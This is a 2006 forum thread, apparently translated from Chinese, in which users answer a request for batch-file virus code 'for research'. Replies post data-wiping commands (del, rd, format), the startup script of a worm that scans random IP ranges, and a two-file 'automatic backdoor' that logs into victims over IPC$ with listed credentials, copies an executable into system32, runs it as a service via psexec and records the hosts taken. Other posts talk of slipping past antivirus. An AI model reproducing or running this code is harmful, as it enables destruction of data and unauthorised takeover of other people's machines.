Title: Question: is there any virus code written in bat, for research purposes?
Author: YYDDOS
Time: 2006-12-13 05:34
Title: Question: is there any virus code written in bat, for research purposes?
;);)
Author: zh159
Time: 2006-12-13 05:41
Yes:
del/q *.*
rd/q *
format
^_^
Author: tianzizhi
Time: 2006-12-13 05:45
The startup script of the Bat.Worm.Muma virus:
START.BAT:
CALL MUMA.BAT
SET IPA=192.168
CALL 10.BAT 0
:NEARAGAIN
netstat -n|find ":" >A.TMP
FOR /F "tokens=7,8,9,10,12 delims=.: " %%I IN (A.TMP) DO SET NUM1=%%I&& SET NUM2=%%J&& SET NUM3=%%K&& SET NUM4=%%L&& SET NUM5=%%M&& CALL NEAR.BAT
:START
CALL RANDOM.BAT
IF "%NUM1%"=="255" GOTO NEARAGAIN
IF "%NUM1%"=="192" GOTO NEARAGAIN
IF "%NUM1%"=="127" GOTO NEARAGAIN
IF "%NUM2%"=="255" GOTO NEARAGAIN
IF "%NUM3%"=="255" GOTO NEARAGAIN
IF "%NUM4%"=="255" GOTO NEARAGAIN
SET IPA=%NUM1%.%NUM2%
ECHO START > A.LOG
PING %IPA%.%NUM3%.1>B.TMP
PING %IPA%.%NUM3%.%NUM4%>>B.TMP
FIND /C /I "from" B.TMP
IF ERRORLEVEL 1 GOTO START
CALL 10.BAT %NUM3%
DEL A.LOG
GOTO START
Below is an automatic backdoor.
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection ............OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
Author: ccwan
Time: 2006-12-13 05:46
Hard Disk Killer (Australian edition) batch source code
I once saved the code as *.bat, and it was immediately killed by Kaspersky ^_^
Author: echo
Time: 2006-12-13 05:49
Come on, a TXT will get killed too, but I saw a BAT SHELL that said there is a way to get past it, hehe
Author: vkill
Time: 2006-12-13 05:57
Without IPC$, psexec cannot be used; actually the one above targets machines that are far too insecure
Author: lxmxn
Time: 2006-12-13 06:14
Quote:
@copy windrv32.exe\\%1\admin$\system32
There's a syntax error, right?
Author: YYDDOS
Time: 2006-12-13 13:03
What destructive power does the virus above have?